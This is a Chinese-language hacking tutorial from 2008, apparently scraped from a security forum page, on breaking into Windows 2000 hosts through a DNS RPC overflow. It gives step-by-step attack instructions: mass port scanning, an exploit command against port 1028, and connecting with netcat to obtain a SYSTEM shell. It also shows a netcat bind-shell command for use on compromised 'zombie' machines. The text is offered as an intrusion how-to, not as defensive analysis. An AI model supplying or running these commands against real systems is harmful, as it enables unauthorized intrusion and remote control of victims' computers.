漏洞入侵技巧1、选择superscan进行扫描,在端口列表中勾选上53、445端口,然后选择主机段进行扫描。 2、选择存在53、445端口的主机,在cmd下输入dns -t ip对主机进行特定漏洞端口扫描,“1028 :Vulnerability”表示 1028端口存在溢出漏洞,“os:window 2000”表示系统类型为window 2000。 3、在执行dns -t 2000all ip 1028 对目标主机进行溢出。connection to target host tcp port established 成功连接到主机的tcp端口上, successfully bound to the vulnerale dcerpc interface 已经连接到对方的rpc端口上,os fingerprint result:windows 2000 系统指纹鉴定对方是wind2000系统,attack sent,入侵检测,黑客文讯,广西安全网络">
定阅RSS 繁体中文 设为首页 加入收藏
站内搜索
黑客文章 黑客下载
您所在的位置: 广西安全网络 >> 黑客文讯 >> 入侵检测 >> 正文
利用DNS溢出漏洞入侵技巧
作者:Gxfa 来源:本站原创 更新:2008-8-20 23:32:17  点击:
前提是必须要开放53、445端口 1、选择superscan进行扫描,在端口列表中勾选上53、445端口,然后选择主机段进行扫描。 2、选择存在53、445端口的主机,在cmd下输入dns -t ip对主机进行特定漏洞端口扫描,“1028 :Vulnerability”表示 1028端口存在溢出漏洞,“os:window 2000”表示系统类型为window 2000。 3、在执行dns -t 2000all ip 1028 对目标主机进行溢出。connection to target host tcp port established 成功连接到主机的tcp端口上, successfully bound to the vulnerale dcerpc interface 已经连接到对方的rpc端口上,os fingerprint result:windows 2000 系统指纹鉴定对方是wind2000系统,attack sent,check port 1100 攻击代码已经成功发送,并尝试连接1100端口。当出现最后这一句 提示语句的时候就意味着我们要成功了。 4、怎么连接对方的1100端口呢,当然我们要使用nc了。 5、nc全称叫"netcat",这是一个非常简单易用的基于tcp/ip协议(c/s模型的)的“瑞士军刀”。下面介绍一下它的几个常用功能 1、nc.exe -vv -l -p 6069,表示在本地6069端口上进行监听。-vv:显示详细的信息。-l:进行监听,监听入站信息。-p:监听所使用的 端口号。 2、正如我们遇到的情况,对方已经开放了一个端口。他在等待我们连接哦,连接上去会有什么呢?当然是system权限的shell了。 nc.exe -vv 127.0.0.1 5257,连接ip为127.0.0.1的5257端口。 3、还可以在本地监听端口的同时绑定shell,就相当于一个telnet服务端。通常这个命令在肉鸡上执行,然后当我们连接上去就可以获得 这个shell了。nc.exe -l -p 5257 -t -e cmd.exe,在本机5257端口上监听并绑定cmd.exe。-e 作用就是程序定向。-t以telnet的形式 来应答。 4、它可以用来手动对主机提交数据包(通常为80)端口,nc.exe -vv 127.0.0.1 80
转截请注明:来自 广西安全网络 Http://www.gxfa.com
在百度搜索:利用DNS溢出漏洞入侵技巧相关文章
在Google搜索:利用DNS溢出漏洞入侵技巧相关文章
在雅虎搜索:利用DNS溢出漏洞入侵技巧相关文章

  • 上一篇文章:

  • 下一篇文章: 没有了
  • 数据载入中,请稍后……